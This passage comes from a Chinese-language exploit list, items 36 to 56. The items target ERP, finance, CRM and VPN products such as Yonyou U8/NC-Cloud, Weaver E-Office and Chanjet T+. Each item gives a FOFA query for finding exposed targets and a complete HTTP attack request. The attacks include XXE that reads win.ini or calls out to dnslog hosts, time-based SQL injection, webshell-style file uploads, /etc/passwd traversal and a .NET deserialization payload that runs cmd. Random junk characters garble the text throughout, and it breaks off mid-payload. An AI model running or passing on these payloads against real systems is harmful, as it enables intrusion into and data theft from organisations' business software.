User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% r+ _$ \! z6 u8 Y
Accept-Encoding: gzip, deflate
' M3 R( W; y3 k4 ?Accept: */*
( r$ Y! @+ x" ]& `Connection: close# E# e8 ~: J5 k% C/ U; V
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
( ?8 `! e& R# a1 N' g6 }Content-Length: 190
& w$ o# q" H W/ {( R K+ AContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0' @' [" R4 _: ~( a
+ s( O- B3 w: ]* D6 |8 s% j! V--fd28cb44e829ed1c197ec3bc71748df0
8 G' v8 G9 O/ \% Y3 K9 RContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"3 U3 H( X- r) p- M
6 H* t/ @% E& H b<%out.println(1111*1111);%>6 q$ M& ?' }1 s1 u# [, y
--fd28cb44e829ed1c197ec3bc71748df0--4 |( I2 q. S% V8 T" f: y
. T3 z6 x6 K5 r3 i$ q7 N2 c
& A( N5 `6 r$ y% K$ v3 o. k; l/ }
36. 用友NC-Cloud soapFormat XXE' ?8 _) Z% P( z8 Q) R& U# B" ~' d
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
( x$ g. U$ z( K- Q. P$ w/ dPOST /uapws/soapFormat.ajax HTTP/1.1 R; U' Y7 f0 Q" t
Host: 192.168.40.130:8989
0 J9 X, A% ^$ ~: CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.03 r) ]1 z7 W; Z8 e
Content-Length: 263) d. W% i& N9 F* Z5 I; a6 [- I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' t+ Y, M2 M- Z
Accept-Encoding: gzip, deflate2 C8 E: b" g' R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' u, s) n5 T9 o n, k9 N
Connection: close0 y* T8 U: z8 h, B1 `. ^. u$ i
Content-Type: application/x-www-form-urlencoded
! S1 N( f) N5 u9 H3 D' e: wUpgrade-Insecure-Requests: 17 l6 H/ n3 w9 }/ L) k7 F
# E! \% T! K" P+ M. Lmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a# z0 P7 {- z; G% |) A8 \1 F' \) f
3 @; |- N w4 q7 d: u1 j6 B% O
' h5 ]" O7 g! v5 T8 y& P
37. 用友NC-Cloud IUpdateService XXE
! I8 j' i2 @0 X4 F0 S4 o7 i: zFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/", n9 [- f6 R u/ G
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.17 k' c% |" q+ U0 S* n8 {$ ~
Host: 192.168.40.130:8989
. _# G4 q: p- z( W* V: g" KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36( G' W) v8 w- H: o/ d+ H
Content-Length: 421
$ p6 d( i7 E1 ?6 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 q0 W4 @9 Y$ vAccept-Encoding: gzip, deflate( F$ F9 m: i' u3 m2 O4 j+ B
Accept-Language: zh-CN,zh;q=0.9
7 N/ v% c$ S; r) ^0 uConnection: close- ?* u6 H+ h% a4 S- J$ P
Content-Type: text/xml;charset=UTF-8" Q9 g7 f) O5 }; f; I5 y
SOAPAction: urn:getResult2 M+ ~( x1 {3 D& W
Upgrade-Insecure-Requests: 1
7 |7 ]6 Z! c( i6 o2 M0 {) Y" p
! ~; r) k3 n, e. P' {7 g<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
1 ?9 L* t0 R( X: B$ i<soapenv:Header/>
* a' I4 f. I' [5 J9 e8 M; F/ ?( N y+ B<soapenv:Body>: h/ @+ a6 i; `7 E/ r7 H f
<iup:getResult>$ g$ }& l o" F* i
<!--type: string-->' @% }; n4 f' l5 w( s; h3 B
<iup:string><![CDATA[
# U. G8 P3 |& |: a<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
$ j+ n# n! K2 n) F' u+ S) G<xxx/>]]></iup:string>4 ^4 B* m2 z: [$ H! c. ?
</iup:getResult>
) i* T1 k3 `2 K, M2 i</soapenv:Body>
# P. `8 Y/ e8 h* F" V( a4 i; @</soapenv:Envelope>$ K% n- @/ h( {* d7 C3 q; H5 j
; {8 g% z1 d+ {7 u
# ~- f3 O: |( t; l! l. i4 n) q" J9 ^8 i' r: U
38. 用友U8 Cloud smartweb2.RPC.d XXE& Y2 p% h3 I* R( B M! S! A
FOFA:app="用友-U8-Cloud"
3 I/ z5 o) n9 O* D$ NPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1& e: @) Z! C" \& q0 R1 E
Host: 192.168.40.131:8088 F# v5 X Z" }3 h7 k8 B, `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25! s- A' f; k+ d
Content-Length: 260
/ }3 r) H) ~6 s$ ?- {8 ~8 S- eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
4 m$ ], x v2 I# DAccept-Encoding: gzip, deflate3 c8 ?1 m- b& Y( b# o
Accept-Language: zh-CN,zh;q=0.9* G0 ^1 S% Z/ g7 Z, J' ^
Connection: close6 p. y" I7 D, I# i" b
Content-Type: application/x-www-form-urlencoded
2 F5 @* @% {/ |% p. B0 ^! S: r t
* O! ~8 H% I3 A0 n__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>1 `0 k4 D$ }6 N. d/ ^. r w
, R# _$ N0 ~+ Z" Z R) D) T5 j9 [' u# G7 K" B
39. 用友U8 Cloud RegisterServlet SQL注入6 Z2 Y: e' ~8 J! \
FOFA:title="u8c"* p& M- V+ c e" @
POST /servlet/RegisterServlet HTTP/1.19 g1 n$ K/ @7 v5 [
Host: 192.168.86.128:8089
4 j1 z" x+ i9 Q, n1 D4 }) G. @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 {3 T, t' S. M2 r( b% ~- DConnection: close* N4 R3 _) I$ [3 [3 L
Content-Length: 85
* U# `5 b J4 \$ P; C) DAccept: */** P0 a7 E- Z _% ^! Y j& H- s3 M g
Accept-Language: en6 Y! c0 i; f8 @9 H; d3 b
Content-Type: application/x-www-form-urlencoded- B: k9 T6 {+ a! Q) \- W6 q
X-Forwarded-For: 127.0.0.1
- }: t1 X) i" K B( {0 e1 @8 oAccept-Encoding: gzip
7 V. f( |# L9 E
5 j! P8 d+ l+ J8 e: X' Ausercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
# C9 `) J. A5 t9 a' p9 k
: z3 K7 x, w8 ?
, g2 l2 A* \* U% c; k40. 用友U8-Cloud XChangeServlet XXE
* N+ r- E6 r/ y7 h8 p3 |FOFA:app="用友-U8-Cloud"7 I2 P4 c" y# g
POST /service/XChangeServlet HTTP/1.1
, L% F1 t0 z" z4 d7 }6 W" d0 D( W4 }Host: x.x.x.x
% k# |7 j9 B1 X" }" o. PUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 Y. p% W3 u3 ~8 ~: j& ?7 b' [Content-Type: text/xml9 A4 q5 ~! q3 c6 J+ |
Connection: close* A, u5 J0 D! _. O' p
, ~# I2 n0 ?. |3 G7 m* ~
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
) D* C, A; M& O/ \# ^( l, s c" A% o* s6 O* U( }& _
. u* ?/ Q- Q7 w+ h6 p+ }7 U41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 y9 }+ Z! L R0 i5 S0 fFOFA:app="用友-U8-Cloud"! o. ?5 W% A( z7 H8 y' Y9 V1 T8 O
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.11 @3 G2 \' q* |& ^6 {
Host:
( l ?# j8 F! `: w1 H2 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) B3 q* z1 J4 K5 v7 B4 N# {Content-Type: application/json
5 R- X8 H2 n( j& l. q' @" T0 P$ u7 ZAccept-Encoding: gzip! g% C- q/ {# _ @( U' e- ~! l# r
Connection: close: y9 p- a# X7 k# `
9 t9 t; [0 z6 `
] L {5 Q" y& P- t42. 用友GRP-U8 SmartUpload01 文件上传/ h8 k6 e+ v9 h) m# C1 D) F+ c" F
FOFA:app="用友-GRP-U8"
1 L0 I! I1 S% ?% |" n, XPOST /u8qx/SmartUpload01.jsp HTTP/1.1: }" ^; t$ ^3 `. B
Host: x.x.x.x; p7 h6 d, Q% n: v/ b( h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
4 M! U/ E( Z' | W9 D0 I* wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 }6 U5 {; l8 c4 p" ]5 `
& m" ]5 q1 u4 Z$ Z# t0 o2 r
PAYLOAD
; m2 \; i% l6 F- a4 E- h) Z8 y0 H. [# w9 ~
; ]. ?1 K4 N* J ^; d- P
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml& h) e0 N$ y( c7 O( m2 e
, U& _7 F6 H. g43. 用友GRP-U8 userInfoWeb SQL注入致RCE
7 q/ M# j' {# U' b: e& D( @; ?FOFA:app="用友-GRP-U8": g& X7 H$ L" _& d& v
POST /services/userInfoWeb HTTP/1.1
- X7 X! E$ X/ z) y( f8 wHost: your-ip
: w8 }# N2 ^! U* q8 B; aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 z( {. }3 R& Z" E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 E$ C2 X r3 S5 u' T$ i; g
Accept-Encoding: gzip, deflate
, u# ~& H0 w p, ~, vAccept-Language: zh-CN,zh;q=0.9" {7 O( m- V. R7 t, Y; K) _' S
Connection: close& z* L" d$ n- ]( P/ ^
SOAPAction:
; w% I1 j' N0 `( d9 o* {1 ZContent-Type: text/xml;charset=UTF-8* J7 ^) w8 Z# R- _4 u1 Z& _
+ C' `" y9 k( J
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">6 p2 N* M6 @" \- Q$ X2 o
<soapenv:Header/>
' f. E1 H. N$ p1 x+ H <soapenv:Body>
& L- W, N6 e. [# b/ a! g: {7 n <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
& {; @/ v: S. n3 a- z; N! G- a u <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
: P2 R$ s+ v( M% Q. T </ser:getUserNameById>
% L0 ?- j4 c! {, |1 g& J, G </soapenv:Body>
4 V8 q6 K9 S2 ]# X3 t</soapenv:Envelope>7 e. x" n0 v' Y0 v* l w
8 u3 s" j" V6 v- _" _* n" E
6 E4 V0 o! {8 V9 k" C44. 用友GRP-U8 bx_dj_check.jsp SQL注入
, W% u' u) b) Z' V. t' pFOFA:app="用友-GRP-U8"+ K, e" ]$ K7 w0 s5 q
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
- r4 Y. M5 i T. \Host: your-ip
* e8 N. u6 j7 |' R% ?+ rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36; l- G+ i* {6 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# p* [! t6 I( ]. q. W
Accept-Encoding: gzip, deflate
- x: m0 u6 _7 S7 d0 R9 TAccept-Language: zh-CN,zh;q=0.9' o9 {: U# \" {. q" {
Connection: close
4 D' q1 [( c; I) i5 k+ V" N0 e
U7 y& b- z* S" ^2 l8 N4 W: u45. 用友GRP-U8 ufgovbank XXE
1 {7 O/ x9 T$ }& d% ^& ]7 z' zFOFA:app="用友-GRP-U8"" H; H2 n1 r) |" @
POST /ufgovbank HTTP/1.15 A/ V' h# m/ ~1 J( \; r
Host: 192.168.40.130:222
& W6 S. n% O4 G+ [2 ]. X6 y: [" D- VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0& p& U$ ^6 Z3 h- x9 l9 ^# O0 `
Connection: close/ C* b3 y/ }- A
Content-Length: 161
' U: \4 {* |7 Q) [2 K' o3 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- |5 \ K m# I. y$ x. t# A( q+ F: K" {; B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' N* W3 } X- i8 c j) v8 [Content-Type: application/x-www-form-urlencoded
4 T ?& ?7 Z8 C% X5 Q2 OAccept-Encoding: gzip i( O8 M) e; Y: R' ^
2 j) w$ B% ?4 S
reqData=<?xml version="1.0"?>( R1 b: `8 W# G' q9 z
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest) A) P4 e- _# L; Q3 c' X
$ r$ n% H: E( o) @, N$ Y
6 P0 y4 ^; {; ]( }6 U0 @. `! K* G- F5 U46. 用友GRP-U8 sqcxIndex.jsp SQL注入
: s2 n' n' C3 {$ N# DFOFA:app="用友-GRP-U8"- m5 }0 i( k, F g6 J
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.12 r& N, H- R- J% T+ W
Host: your-ip8 [* \0 j" r2 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36% y2 E: M @5 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Q J8 |3 J3 | J1 K" S" {Accept-Encoding: gzip, deflate$ B$ c; b! W, }7 K" ^1 x/ O2 F
Accept-Language: zh-CN,zh;q=0.9. o! K$ U7 U) g
Connection: close7 z; F( G6 }4 n- z! V
* z* x) z+ T6 H1 F+ a7 x
7 J% [9 ^/ q5 ?
47. 用友GRP A++Cloud 政府财务云 任意文件读取
) y4 W! Z* `2 M: K) N3 YFOFA:body="/pf/portal/login/css/fonts/style.css"7 |3 d" l0 T1 G5 K( S3 W% g
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.18 J& w% V* X Z8 ^3 w, \( c. ?& W4 H5 ^
Host: x.x.x.x
9 S3 V7 o" G3 E9 d4 S% b5 pCache-Control: max-age=0
5 `# u- o+ J: y/ T5 WUpgrade-Insecure-Requests: 1
! D+ {0 e7 w0 P+ u/ V4 |/ z& BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 E N# }2 A: x7 G$ }# h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 N1 {+ ~3 _& [/ `
Accept-Encoding: gzip, deflate, br& F& L1 o9 E) E8 |" P
Accept-Language: zh-CN,zh;q=0.9
5 E, a$ w* l- _+ d7 {If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT& t+ c. t, w, K7 K5 K1 ]( K
Connection: close
; v' _$ b% M% ?+ @/ V
2 S) d1 ~7 c' A. \& r4 ~' U h. W/ _: a8 O1 B* p3 C( y4 d
; s; [: [8 S/ z* q8 G! i& K
48. 用友U8 CRM swfupload 任意文件上传
; w. S% M* o9 v- GFOFA:title="用友U8CRM"
. h$ y/ D: Z3 G9 \* w6 C; m# ^7 y" CPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1* {& K0 Y/ I+ z8 k9 i0 m
Host: your-ip R: g+ d* L9 ~# P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 T& j2 ^5 I; Z* z* q2 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 e+ |: D' I0 Q; xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 S M+ G) d/ C S, q; V6 SAccept-Encoding: gzip, deflate' r! C" Y6 s% M2 C* L" H
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
$ s; _. ?6 U9 H- |3 l------2695209672394068716424300668551 C- l: U2 V7 r, O: l
Content-Disposition: form-data; name="file"; filename="s.php"6 y! I" K4 h8 F% I
1231: _+ K) h8 {6 ^6 H, }8 L
Content-Type: application/octet-stream
, A- O) g6 [ U, F------269520967239406871642430066855
0 f% t$ D$ t) Q+ tContent-Disposition: form-data; name="upload"
6 i) S# b9 M" r+ Q7 Eupload7 v% W) @0 x' w" s% i6 G
------269520967239406871642430066855--$ W: A$ j8 u7 f& b8 N. O
* C3 }8 M+ A8 G" ~8 T* ?, F, _/ \
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
3 q- D6 H. Y8 U& oFOFA:body="用友U8CRM"
4 i+ s& Q4 r0 i0 H% V3 A y/ }1 I/ r6 ]( K0 x
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1* ]+ ^/ `3 |( J& H% q6 @. i
Host: x.x.x.x
2 S# g/ m0 W5 N9 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. u6 I/ z1 D% T! N2 p$ |
Content-Length: 329
. l7 T$ _ K+ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# i+ X- Z2 G3 {* j8 YAccept-Encoding: gzip, deflate
& Q: y0 ^' `0 `4 [5 f) sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ E$ H9 A5 w7 f" ^/ f( j: vConnection: close
" Z/ f2 y$ @, q/ d; E% F4 k# n* iContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
5 ~* B* H" F, t- \& M' X8 G7 \. e# {1 H$ }; g V2 x! E
-----------------------------vvv3wdayqv3yppdxvn3w
7 o( N! Q9 z+ G& N5 N c6 _' W" yContent-Disposition: form-data; name="file"; filename="%s.php "
0 d. M2 k# U3 e: w- o, t: cContent-Type: application/octet-stream
- | F, R% i" Q& ^$ l* Q6 U4 R. @- w2 J/ b
wersqqmlumloqa; O: g) D9 F2 c% ~
-----------------------------vvv3wdayqv3yppdxvn3w, G7 b% F7 H2 | Z2 F* @
Content-Disposition: form-data; name="upload"
3 D! t9 o* `2 p
% N. _6 x4 |5 v# Qupload
. h) k7 @3 U# ?-----------------------------vvv3wdayqv3yppdxvn3w--
# x. }. f/ T* Y4 X* A' y* {4 u1 V, r- A, Q; E
4 l& f q7 n5 yhttp://x.x.x.x/tmpfile/updB3CB.tmp.php0 \- ]; P3 g" q5 B% e( T/ ?! L3 f
1 _$ D6 a. X& w! x9 G( l50. QDocs Smart School 6.4.1 filterRecords SQL注入
) J9 P- S9 X2 ~( D5 w0 nFOFA:body="close closebtnmodal"8 [5 m+ C4 L! D
POST /course/filterRecords/ HTTP/1.1
4 L2 j. K+ k& }& v5 fHost: x.x.x.x) j6 I6 m2 U) [2 g9 V4 n' J
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" {1 g' i' h7 i2 gConnection: close- |7 }0 J/ O4 F+ B. a
Content-Length: 224
3 X" _. w% S7 x$ h) rAccept: */*1 H+ _4 I5 J9 N: n
Accept-Language: en: d: H) O6 w* g. d- v
Content-Type: application/x-www-form-urlencoded
+ g9 Q2 `; h2 M/ E. l* G' MAccept-Encoding: gzip6 t* r8 @) V% Q) d% b% m
7 |1 I; X6 l, e* v" T5 Vsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
8 t7 i# r' w5 [
8 H: K* x$ W3 G, L
1 L4 e C7 b8 f51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入/ E7 o F* X1 H% O& R% p) c4 s' b! h
FOFA:app="云时空社会化商业ERP系统"
: t8 @; j! d; ^8 J3 c) b8 DGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% D4 W s/ H5 C" c9 e% M+ w' IHost: your-ip" k* J3 s' J6 b; ?0 Q% {6 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36- Q% c) u% A, S. | v' K* {% n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& v1 F/ {. J- Z3 Z+ s1 ~4 ?# g
Accept-Encoding: gzip, deflate1 J u( L( ~- p9 g
Accept-Language: zh-CN,zh;q=0.9
b: E- o, L) G I' _' yConnection: close0 e, l1 i* t7 ~3 ]+ n
* n/ U& L ]% p: U( r" B6 `+ X. K& I# @6 t+ s4 n8 e. ^) L# W+ J
52. 泛微E-Office json_common.php sql注入
8 v) }& a* v$ o" a4 Z' x. _# i& Z; iFOFA:app="泛微-EOffice"( ~# J- ~1 x! F5 h6 r( i7 ]: H
POST /building/json_common.php HTTP/1.1
( |3 [0 b U. B2 n3 x3 ~* I, kHost: 192.168.86.128:8097
; A+ l, e z# y4 t/ l$ ~+ J# EUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% o5 I* k/ I1 w7 m4 J# A; |9 w
Connection: close7 } M) n" [- _
Content-Length: 87
: }' \4 ? w( X* G& qAccept: */*$ G* m- ? k9 ~6 f+ s) v9 s# j9 `
Accept-Language: en3 q$ x9 b3 [8 c$ p2 {5 R
Content-Type: application/x-www-form-urlencoded Y4 ?9 t- [& o9 N
Accept-Encoding: gzip1 S9 D* i; f" k+ M7 \
2 x) @5 q, M% F/ x" N
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333. |7 P, a* [9 [3 J
4 Y" N6 F4 u# a, F) X# s
# M8 `5 a8 t w/ c! {/ J6 A4 m% V0 ^53. 迪普 DPTech VPN Service 任意文件上传; W1 {+ q* l/ @$ ^% ^# k9 K2 u4 e+ a
FOFA:app="DPtech-SSLVPN"7 k' k A6 _. Z
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
! J8 z+ Z2 j2 V! I8 I: V Q5 z2 E, d1 z9 A9 j t
- ^. s( W3 p& A4 d/ S
54. 畅捷通T+ getstorewarehousebystore 远程代码执行+ `4 G$ F# X! C* o
FOFA:app="畅捷通-TPlus"
; t( C6 h, m! c. g3 K" N第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
A" G1 ~2 W6 w"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"$ o: c3 h5 J3 m" ~
/ m4 j' W; {; e
+ F8 J7 Z2 ^- t9 z( ?5 n. H完整数据包' r* k N, i: O! d, v
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1$ Z5 h% ~" A' ?6 L
Host: x.x.x.x
) j, Z- e" O( C' O4 \User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
, x0 }8 A( j7 v5 U' U. {5 ]Content-Length: 593
# s B0 p: X9 O3 i/ F, j; {
; h# C/ K; R; T2 w6 z; @{2 f, q* Z4 S- x' U6 U X
"storeID":{; K; B# W* z: m, x4 w0 k& j
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& R1 J3 a( q' A: [) [; ~3 @
"MethodName":"Start",
. \3 `, X1 `! E o v& U) `: z "ObjectInstance":{% W: s0 D. H- N! z; f7 O
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) [" s- D& Q( f" w) [7 J- c
"StartInfo":{
W2 V# ]2 F8 v# O F% ? "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( `& ~3 g$ K+ z- Z
"FileName":"cmd",
$ f& H9 j+ s7 l0 U$ c* d "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 u7 L0 d& A1 x }" A+ t/ u, e" J+ S' H
}) O9 p% q: v5 |# g
}
7 ^* L7 b& `0 ]- Y& M5 v+ u! L/ z}
" r+ t1 L: [4 J- B% h' ]7 y. j. i2 i" l I- v
5 k: ~$ t1 r0 _, U; L( \5 L- `
第二步,访问如下url8 b X _. {) o0 B
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
. \; n* J' G/ c5 |1 L5 [) Y' | w) j& B* r
: M" |# B' m2 ?& n
55. 畅捷通T+ getdecallusers信息泄露
( @) a/ H) C8 c- n. q: WFOFA:app="畅捷通-TPlus"1 A" I7 y8 D( N* O$ x
第一步,通过5 n5 L2 t, V5 [( E; R$ ]/ S' u
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie0 o, f3 N# b( ^# {, h' z& D# X9 o
第二步,利用获取到的Cookie请求
- f4 W7 Q% I4 q7 f; b/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
+ B* ?( t+ c# ]* q/ v
4 }6 o; y, B2 ~% ^$ S0 \; }56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE4 K/ |1 r0 l+ c. K8 s
FOFA: app="畅捷通-TPlus"5 l+ Q6 P2 d: k
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1$ O; S1 V0 V E! M. W! S# l
Host: x.x.x.x
& @+ V9 _- y2 T/ @- ^% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 L1 k8 Y; _! g; j# Y; Z
Content-Type: application/json
# t& z! `/ u2 I: _9 v% l0 y4 X! X) E, X
{% X6 h: X2 f4 k: G* M! o
